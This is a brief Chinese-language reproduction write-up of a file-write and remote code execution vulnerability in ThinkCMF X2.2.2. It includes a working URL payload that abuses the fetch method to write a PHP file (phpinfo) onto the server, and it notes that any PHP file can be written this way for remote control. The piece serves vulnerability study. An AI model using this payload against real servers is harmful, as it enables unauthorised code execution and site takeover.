1.搭建环境
下载ThinkCMF X2.2.2文件,把文件放入网站目录下,打开网站,按照提示一步步进行安装。(thinkCMF安装包,百度搜索获取)
2.漏洞概述
攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
3.漏洞利用
通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,下面将把PHP查看配置函数phpinfo()写入test.php文件
phpinfo版payload如下
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
执行payload,页面将是空白的
访问test.php
到达这一步你就可以向服务器写入任意PHP文件,实现远程控制,构造恶意URL等。,